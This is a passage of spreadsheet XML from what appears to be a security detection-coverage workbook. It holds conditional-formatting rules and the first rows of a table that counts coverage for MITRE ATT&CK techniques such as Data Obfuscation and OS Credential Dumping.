  <conditionalFormatting sqref="E6:G9">
    <cfRule type="expression" dxfId="310" priority="493">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E14:G14 E16:G18">
    <cfRule type="expression" dxfId="309" priority="410">
      <formula>IF(E14&lt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23:G24 E26:G27">
    <cfRule type="expression" dxfId="308" priority="32">
      <formula>IF(E23&lt;B23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32:G32 E35:G36">
    <cfRule type="expression" dxfId="307" priority="26">
      <formula>IF(E32&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E41:G41 E43:G45">
    <cfRule type="expression" dxfId="306" priority="20">
      <formula>IF(E41&lt;B41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E50:G51">
    <cfRule type="expression" dxfId="305" priority="14">
      <formula>IF(E50&lt;B50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G6:G9">
    <cfRule type="expression" dxfId="304" priority="492">
      <formula>IF(OR(G6&lt;E6,G6&lt;F6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G14 G16:G18">
    <cfRule type="expression" dxfId="303" priority="409">
      <formula>IF(OR(G14&lt;E14,G14&lt;F14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G23:G24 G26:G27">
    <cfRule type="expression" dxfId="302" priority="31">
      <formula>IF(OR(G23&lt;E23,G23&lt;F23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G32 G35:G36">
    <cfRule type="expression" dxfId="301" priority="25">
      <formula>IF(OR(G32&lt;E32,G32&lt;F32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G41 G43:G45">
    <cfRule type="expression" dxfId="300" priority="19">
      <formula>IF(OR(G41&lt;E41,G41&lt;F41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G50:G51">
    <cfRule type="expression" dxfId="299" priority="13">
      <formula>IF(OR(G50&lt;E50,G50&lt;F50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I6:I9">
    <cfRule type="expression" dxfId="298" priority="488">
      <formula>IF(I6&lt;H6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14 I16:I18">
    <cfRule type="expression" dxfId="297" priority="398">
      <formula>IF(I14&lt;H14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:I24 I26:I27">
    <cfRule type="expression" dxfId="296" priority="30">
      <formula>IF(I23&lt;H23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I32 I35:I36">
    <cfRule type="expression" dxfId="295" priority="24">
      <formula>IF(I32&lt;H32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I41 I43:I45">
    <cfRule type="expression" dxfId="294" priority="18">
      <formula>IF(I41&lt;H41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I50:I51">
    <cfRule type="expression" dxfId="293" priority="12">
      <formula>IF(I50&lt;H50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J6:J9">
    <cfRule type="expression" dxfId="292" priority="484">
      <formula>IF(OR(J6&lt;H6,J6&lt;I6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J14 J16:J18">
    <cfRule type="expression" dxfId="291" priority="391">
      <formula>IF(OR(J14&lt;H14,J14&lt;I14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J23:J24 J26:J27">
    <cfRule type="expression" dxfId="290" priority="29">
      <formula>IF(OR(J23&lt;H23,J23&lt;I23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J32 J35:J36">
    <cfRule type="expression" dxfId="289" priority="23">
      <formula>IF(OR(J32&lt;H32,J32&lt;I32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J41 J43:J45">
    <cfRule type="expression" dxfId="288" priority="17">
      <formula>IF(OR(J41&lt;H41,J41&lt;I41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J50:J51">
    <cfRule type="expression" dxfId="287" priority="11">
      <formula>IF(OR(J50&lt;H50,J50&lt;I50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K28:N28">
    <cfRule type="expression" dxfId="286" priority="126">
      <formula>IF(K28&lt;K19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K42:N42 B43:N45">
    <cfRule type="expression" dxfId="285" priority="16">
      <formula>IF(B42&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K43:N43">
    <cfRule type="expression" dxfId="284" priority="193">
      <formula>IF(OR(K43&lt;K44,K43&lt;K45),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K55:N55">
    <cfRule type="expression" dxfId="283" priority="128">
      <formula>IF(K55&lt;K46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L6:L9">
    <cfRule type="expression" dxfId="282" priority="480">
      <formula>IF(L6&lt;K6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L23:L24">
    <cfRule type="expression" dxfId="281" priority="271">
      <formula>IF(L23&lt;K23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L32 L36">
    <cfRule type="expression" dxfId="280" priority="59">
      <formula>IF(L32&lt;K32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L41:L45">
    <cfRule type="expression" dxfId="279" priority="186">
      <formula>IF(L41&lt;K41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L50 L54">
    <cfRule type="expression" dxfId="278" priority="131">
      <formula>IF(L50&lt;K50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N6:N9">
    <cfRule type="expression" dxfId="277" priority="476">
      <formula>IF(N6&lt;M6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N23:N24">
    <cfRule type="expression" dxfId="276" priority="258">
      <formula>IF(N23&lt;M23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N32 N36">
    <cfRule type="expression" dxfId="275" priority="58">
      <formula>IF(N32&lt;M32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N41:N45">
    <cfRule type="expression" dxfId="274" priority="185">
      <formula>IF(N41&lt;M41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N50 N54">
    <cfRule type="expression" dxfId="273" priority="130">
      <formula>IF(N50&lt;M50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="5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tabColor rgb="FFFF3F68"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:CT1086"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="2" ySplit="2" topLeftCell="I52" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="CD3" sqref="CD3:CD78"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="12.5703125" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4" style="4" customWidth="1"/>
    <col min="2" max="2" width="9.7109375" style="4" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="4" customWidth="1"/>
    <col min="4" max="4" width="9" style="6" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="10.7109375" style="6" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="13.5703125" style="4" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="7.5703125" style="4" customWidth="1"/>
    <col min="8" max="8" width="9.7109375" style="4" customWidth="1"/>
    <col min="9" max="9" width="13.7109375" style="4" customWidth="1"/>
    <col min="10" max="10" width="4.5703125" style="4" customWidth="1"/>
    <col min="11" max="11" width="8.5703125" style="4" customWidth="1"/>
    <col min="12" max="12" width="8" style="4" customWidth="1"/>
    <col min="13" max="14" width="7.5703125" style="4" customWidth="1"/>
    <col min="15" max="15" width="11.85546875" style="4" customWidth="1"/>
    <col min="16" max="16" width="4.5703125" style="4" customWidth="1"/>
    <col min="17" max="17" width="8.5703125" style="4" customWidth="1"/>
    <col min="18" max="18" width="9.7109375" style="4" customWidth="1"/>
    <col min="19" max="20" width="7.5703125" style="4" customWidth="1"/>
    <col min="21" max="21" width="14.85546875" style="4" customWidth="1"/>
    <col min="22" max="22" width="4.5703125" style="4" customWidth="1"/>
    <col min="23" max="24" width="8.5703125" style="4" customWidth="1"/>
    <col min="25" max="26" width="10.42578125" style="4" customWidth="1"/>
    <col min="27" max="27" width="15.5703125" style="4" customWidth="1"/>
    <col min="28" max="28" width="5.42578125" style="4" customWidth="1"/>
    <col min="29" max="29" width="8.5703125" style="4" customWidth="1"/>
    <col min="30" max="30" width="8.28515625" style="3" customWidth="1"/>
    <col min="31" max="32" width="7.5703125" style="4" customWidth="1"/>
    <col min="33" max="33" width="16.42578125" style="4" customWidth="1"/>
    <col min="34" max="34" width="4.5703125" style="4" customWidth="1"/>
    <col min="35" max="35" width="8.5703125" style="4" customWidth="1"/>
    <col min="36" max="36" width="9.7109375" style="4" customWidth="1"/>
    <col min="37" max="38" width="7.5703125" style="4" customWidth="1"/>
    <col min="39" max="39" width="15.85546875" style="4" customWidth="1"/>
    <col min="40" max="40" width="6.5703125" style="4" customWidth="1"/>
    <col min="41" max="41" width="8.5703125" style="4" customWidth="1"/>
    <col min="42" max="42" width="9.28515625" style="4" customWidth="1"/>
    <col min="43" max="43" width="7.5703125" style="4" customWidth="1"/>
    <col min="44" max="44" width="9.5703125" style="4" customWidth="1"/>
    <col min="45" max="45" width="7.5703125" style="4" customWidth="1"/>
    <col min="46" max="46" width="4.5703125" style="4" customWidth="1"/>
    <col min="47" max="47" width="8.5703125" style="4" customWidth="1"/>
    <col min="48" max="48" width="5.5703125" style="4" customWidth="1"/>
    <col min="49" max="49" width="7.5703125" style="4" customWidth="1"/>
    <col min="50" max="50" width="10.42578125" style="4" customWidth="1"/>
    <col min="51" max="51" width="11.28515625" style="4" customWidth="1"/>
    <col min="52" max="52" width="4.5703125" style="4" customWidth="1"/>
    <col min="53" max="53" width="8.5703125" style="4" customWidth="1"/>
    <col min="54" max="54" width="5.5703125" style="3" customWidth="1"/>
    <col min="55" max="55" width="7.5703125" style="4" customWidth="1"/>
    <col min="56" max="56" width="10" style="4" customWidth="1"/>
    <col min="57" max="57" width="12.7109375" style="4" customWidth="1"/>
    <col min="58" max="58" width="4.5703125" style="4" customWidth="1"/>
    <col min="59" max="59" width="8.5703125" style="4" customWidth="1"/>
    <col min="60" max="60" width="5.5703125" style="4" customWidth="1"/>
    <col min="61" max="61" width="7.5703125" style="1" customWidth="1"/>
    <col min="62" max="62" width="10" style="1" customWidth="1"/>
    <col min="63" max="63" width="12.28515625" style="1" customWidth="1"/>
    <col min="64" max="64" width="5.5703125" style="1" customWidth="1"/>
    <col min="65" max="65" width="8.5703125" style="1" customWidth="1"/>
    <col min="66" max="68" width="7.5703125" style="1" customWidth="1"/>
    <col min="69" max="69" width="12.42578125" style="1" customWidth="1"/>
    <col min="70" max="71" width="5.5703125" style="1" customWidth="1"/>
    <col min="72" max="72" width="7.85546875" style="1" customWidth="1"/>
    <col min="73" max="73" width="8.5703125" style="1" customWidth="1"/>
    <col min="74" max="74" width="7.5703125" style="1" customWidth="1"/>
    <col min="75" max="75" width="10.85546875" style="1" customWidth="1"/>
    <col min="76" max="76" width="10.7109375" style="1" customWidth="1"/>
    <col min="77" max="77" width="6.7109375" style="5" customWidth="1"/>
    <col min="78" max="78" width="8.5703125" style="5" customWidth="1"/>
    <col min="79" max="81" width="7.5703125" style="1" customWidth="1"/>
    <col min="82" max="82" width="17.42578125" style="1" customWidth="1"/>
    <col min="83" max="84" width="5.5703125" style="5" customWidth="1"/>
    <col min="85" max="86" width="8.5703125" style="5" customWidth="1"/>
    <col min="87" max="89" width="10.7109375" style="1" customWidth="1"/>
    <col min="90" max="90" width="14.42578125" style="1" customWidth="1"/>
    <col min="91" max="91" width="32.85546875" style="5" hidden="1" customWidth="1"/>
    <col min="92" max="93" width="42.42578125" style="5" hidden="1" customWidth="1"/>
    <col min="94" max="228" width="29.140625" style="1" customWidth="1"/>
    <col min="229" max="16384" width="12.5703125" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:93" ht="25.5" customHeight="1">
      <c r="A1" s="663" t="s">
        <v>177</v>
      </c>
      <c r="B1" s="663" t="s">
        <v>285</v>
      </c>
      <c r="C1" s="663" t="s">
        <v>294</v>
      </c>
      <c r="D1" s="663" t="s">
        <v>290</v>
      </c>
      <c r="E1" s="663" t="s">
        <v>291</v>
      </c>
      <c r="F1" s="668" t="s">
        <v>288</v>
      </c>
      <c r="G1" s="665" t="s">
        <v>2448</v>
      </c>
      <c r="H1" s="666"/>
      <c r="I1" s="666"/>
      <c r="J1" s="666"/>
      <c r="K1" s="666"/>
      <c r="L1" s="667"/>
      <c r="M1" s="665" t="s">
        <v>2323</v>
      </c>
      <c r="N1" s="666"/>
      <c r="O1" s="666"/>
      <c r="P1" s="666"/>
      <c r="Q1" s="666"/>
      <c r="R1" s="667"/>
      <c r="S1" s="665" t="s">
        <v>2324</v>
      </c>
      <c r="T1" s="666"/>
      <c r="U1" s="666"/>
      <c r="V1" s="666"/>
      <c r="W1" s="666"/>
      <c r="X1" s="667"/>
      <c r="Y1" s="665" t="s">
        <v>2325</v>
      </c>
      <c r="Z1" s="666"/>
      <c r="AA1" s="666"/>
      <c r="AB1" s="666"/>
      <c r="AC1" s="666"/>
      <c r="AD1" s="667"/>
      <c r="AE1" s="665" t="s">
        <v>2326</v>
      </c>
      <c r="AF1" s="666"/>
      <c r="AG1" s="666"/>
      <c r="AH1" s="666"/>
      <c r="AI1" s="666"/>
      <c r="AJ1" s="667"/>
      <c r="AK1" s="665" t="s">
        <v>2327</v>
      </c>
      <c r="AL1" s="666"/>
      <c r="AM1" s="666"/>
      <c r="AN1" s="666"/>
      <c r="AO1" s="666"/>
      <c r="AP1" s="667"/>
      <c r="AQ1" s="676" t="s">
        <v>1760</v>
      </c>
      <c r="AR1" s="677"/>
      <c r="AS1" s="677"/>
      <c r="AT1" s="666"/>
      <c r="AU1" s="666"/>
      <c r="AV1" s="667"/>
      <c r="AW1" s="665" t="s">
        <v>2328</v>
      </c>
      <c r="AX1" s="666"/>
      <c r="AY1" s="666"/>
      <c r="AZ1" s="666"/>
      <c r="BA1" s="666"/>
      <c r="BB1" s="667"/>
      <c r="BC1" s="665" t="s">
        <v>2329</v>
      </c>
      <c r="BD1" s="666"/>
      <c r="BE1" s="666"/>
      <c r="BF1" s="666"/>
      <c r="BG1" s="666"/>
      <c r="BH1" s="667"/>
      <c r="BI1" s="674" t="s">
        <v>2453</v>
      </c>
      <c r="BJ1" s="675"/>
      <c r="BK1" s="675"/>
      <c r="BL1" s="675"/>
      <c r="BM1" s="675"/>
      <c r="BN1" s="675"/>
      <c r="BO1" s="674" t="s">
        <v>2454</v>
      </c>
      <c r="BP1" s="675"/>
      <c r="BQ1" s="675"/>
      <c r="BR1" s="675"/>
      <c r="BS1" s="675"/>
      <c r="BT1" s="675"/>
      <c r="BU1" s="675"/>
      <c r="BV1" s="671" t="s">
        <v>2455</v>
      </c>
      <c r="BW1" s="672"/>
      <c r="BX1" s="672"/>
      <c r="BY1" s="672"/>
      <c r="BZ1" s="672"/>
      <c r="CA1" s="672"/>
      <c r="CB1" s="671" t="s">
        <v>2456</v>
      </c>
      <c r="CC1" s="672"/>
      <c r="CD1" s="672"/>
      <c r="CE1" s="672"/>
      <c r="CF1" s="672"/>
      <c r="CG1" s="672"/>
      <c r="CH1" s="673"/>
    </row>
    <row r="2" spans="1:93" s="3" customFormat="1" ht="52.5" customHeight="1">
      <c r="A2" s="664"/>
      <c r="B2" s="664"/>
      <c r="C2" s="664"/>
      <c r="D2" s="664"/>
      <c r="E2" s="664"/>
      <c r="F2" s="669"/>
      <c r="G2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="H2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="I2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="K2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="L2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="M2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="N2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="O2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="P2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="Q2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="R2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="S2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="T2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="U2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="V2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="W2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="X2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="Y2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="Z2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AA2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AB2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AC2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AD2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AE2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="AF2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AG2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AH2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AI2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AJ2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AK2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="AL2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AM2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AN2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AO2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AP2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AQ2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="AR2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AS2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AT2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AU2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AV2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AW2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="AX2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AY2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AZ2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="BA2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="BB2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="BC2" s="511" t="s">
        <v>293</v>
      </c>
      <c r="BD2" s="512" t="s">
        <v>4457</v>
      </c>
      <c r="BE2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BF2" s="584" t="s">
        <v>725</v>
      </c>
      <c r="BG2" s="493" t="s">
        <v>2487</v>
      </c>
      <c r="BH2" s="513" t="s">
        <v>4131</v>
      </c>
      <c r="BI2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BJ2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BK2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BL2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BM2" s="325" t="s">
        <v>2488</v>
      </c>
      <c r="BN2" s="336" t="s">
        <v>4132</v>
      </c>
      <c r="BO2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BP2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BQ2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BR2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BS2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="BT2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="BU2" s="397" t="s">
        <v>4131</v>
      </c>
      <c r="BV2" s="338" t="s">
        <v>293</v>
      </c>
      <c r="BW2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BX2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BY2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="BZ2" s="324" t="s">
        <v>2489</v>
      </c>
      <c r="CA2" s="336" t="s">
        <v>4133</v>
      </c>
      <c r="CB2" s="404" t="s">
        <v>293</v>
      </c>
      <c r="CC2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="CD2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="CE2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="CF2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="CG2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="CH2" s="397" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="3" spans="1:93" s="8" customFormat="1" ht="15" customHeight="1">
      <c r="A3" s="4">
        <v>1</v>
      </c>
      <c r="B3" s="4" t="str">
        <f>IFERROR(VLOOKUP(A3,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1001</v>
      </c>
      <c r="C3" s="493" t="str">
        <f>IFERROR(VLOOKUP(B3,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="D3" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B3)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F3" s="286" t="str">
        <f>D3&amp;" ("&amp;E3&amp;")"</f>
        <v>2 (2)</v>
      </c>
      <c r="G3" s="292">
        <v>1</v>
      </c>
      <c r="H3" s="322">
        <v>1</v>
      </c>
      <c r="I3" s="322" t="str">
        <f>H3 &amp; " (" &amp; G3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="J3" s="12">
        <v>1</v>
      </c>
      <c r="K3" s="13">
        <v>0.5</v>
      </c>
      <c r="L3" s="394">
        <v>1</v>
      </c>
      <c r="M3" s="322">
        <v>0</v>
      </c>
      <c r="N3" s="322">
        <v>0</v>
      </c>
      <c r="O3" s="322" t="str">
        <f>N3 &amp; " (" &amp; M3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="P3" s="12">
        <v>0</v>
      </c>
      <c r="Q3" s="13">
        <v>0</v>
      </c>
      <c r="R3" s="394">
        <v>0</v>
      </c>
      <c r="S3" s="409">
        <v>1</v>
      </c>
      <c r="T3" s="4">
        <v>1</v>
      </c>
      <c r="U3" s="322" t="str">
        <f>T3 &amp; " (" &amp; S3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="V3" s="4">
        <v>1</v>
      </c>
      <c r="W3" s="13">
        <v>0.5</v>
      </c>
      <c r="X3" s="394">
        <v>1</v>
      </c>
      <c r="Y3" s="392">
        <v>1</v>
      </c>
      <c r="Z3" s="392">
        <v>1</v>
      </c>
      <c r="AA3" s="322" t="str">
        <f>Z3 &amp; " (" &amp; Y3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="AB3" s="392">
        <v>1</v>
      </c>
      <c r="AC3" s="16">
        <v>0.5</v>
      </c>
      <c r="AD3" s="394">
        <v>1</v>
      </c>
      <c r="AE3" s="392">
        <v>0</v>
      </c>
      <c r="AF3" s="392">
        <v>0</v>
      </c>
      <c r="AG3" s="322" t="str">
        <f>AF3 &amp; " (" &amp; AE3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AH3" s="392">
        <v>0</v>
      </c>
      <c r="AI3" s="16">
        <v>0</v>
      </c>
      <c r="AJ3" s="394">
        <v>0</v>
      </c>
      <c r="AK3" s="392">
        <v>1</v>
      </c>
      <c r="AL3" s="392">
        <v>1</v>
      </c>
      <c r="AM3" s="322" t="str">
        <f>AL3 &amp; " (" &amp; AK3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="AN3" s="392">
        <v>1</v>
      </c>
      <c r="AO3" s="16">
        <v>0.5</v>
      </c>
      <c r="AP3" s="394">
        <v>1</v>
      </c>
      <c r="AQ3" s="292">
        <v>0</v>
      </c>
      <c r="AR3" s="322">
        <v>0</v>
      </c>
      <c r="AS3" s="322" t="str">
        <f>AR3 &amp; " (" &amp; AQ3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT3" s="12">
        <v>0</v>
      </c>
      <c r="AU3" s="13">
        <v>0</v>
      </c>
      <c r="AV3" s="394">
        <v>0</v>
      </c>
      <c r="AW3" s="392">
        <v>0</v>
      </c>
      <c r="AX3" s="392">
        <v>0</v>
      </c>
      <c r="AY3" s="322" t="str">
        <f>AX3 &amp; " (" &amp; AW3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AZ3" s="4">
        <v>0</v>
      </c>
      <c r="BA3" s="16">
        <v>0</v>
      </c>
      <c r="BB3" s="394">
        <v>0</v>
      </c>
      <c r="BC3" s="292">
        <v>1</v>
      </c>
      <c r="BD3" s="322">
        <v>1</v>
      </c>
      <c r="BE3" s="322" t="str">
        <f>BD3 &amp; " (" &amp; BC3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="BF3" s="12">
        <v>1</v>
      </c>
      <c r="BG3" s="13">
        <v>0.5</v>
      </c>
      <c r="BH3" s="394">
        <v>1</v>
      </c>
      <c r="BI3" s="292">
        <v>1</v>
      </c>
      <c r="BJ3" s="322">
        <v>1</v>
      </c>
      <c r="BK3" s="322" t="str">
        <f>BJ3 &amp; " (" &amp; BI3 &amp; ")"</f>
        <v>1 (1)</v>
      </c>
      <c r="BL3" s="12">
        <v>1</v>
      </c>
      <c r="BM3" s="13">
        <v>0.5</v>
      </c>
      <c r="BN3" s="394">
        <v>1</v>
      </c>
      <c r="BO3" s="292">
        <v>3</v>
      </c>
      <c r="BP3" s="322">
        <v>3</v>
      </c>
      <c r="BQ3" s="322" t="str">
        <f>BP3 &amp; " (" &amp; BO3 &amp; ")"</f>
        <v>3 (3)</v>
      </c>
      <c r="BR3" s="12">
        <v>1</v>
      </c>
      <c r="BS3" s="12">
        <v>2</v>
      </c>
      <c r="BT3" s="13">
        <v>1</v>
      </c>
      <c r="BU3" s="394">
        <v>2</v>
      </c>
      <c r="BV3" s="292">
        <v>0</v>
      </c>
      <c r="BW3" s="322">
        <v>0</v>
      </c>
      <c r="BX3" s="322" t="str">
        <f>BW3 &amp; " (" &amp; BV3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY3" s="12">
        <v>0</v>
      </c>
      <c r="BZ3" s="13">
        <v>0</v>
      </c>
      <c r="CA3" s="394">
        <v>0</v>
      </c>
      <c r="CB3" s="292">
        <v>3</v>
      </c>
      <c r="CC3" s="322">
        <v>2</v>
      </c>
      <c r="CD3" s="322" t="str">
        <f>CC3 &amp; " (" &amp; CB3 &amp; ")"</f>
        <v>2 (3)</v>
      </c>
      <c r="CE3" s="12">
        <v>0</v>
      </c>
      <c r="CF3" s="12">
        <v>2</v>
      </c>
      <c r="CG3" s="13">
        <v>1</v>
      </c>
      <c r="CH3" s="394">
        <v>2</v>
      </c>
      <c r="CM3" s="9"/>
      <c r="CN3" s="9"/>
      <c r="CO3" s="9"/>
    </row>
    <row r="4" spans="1:93" ht="15" customHeight="1">
      <c r="A4" s="4">
        <f>A3+1</f>
        <v>2</v>
      </c>
      <c r="B4" s="4" t="str">
        <f>IFERROR(VLOOKUP(A4,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1003</v>
      </c>
      <c r="C4" s="493" t="str">
        <f>IFERROR(VLOOKUP(B4,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="D4" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B4)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
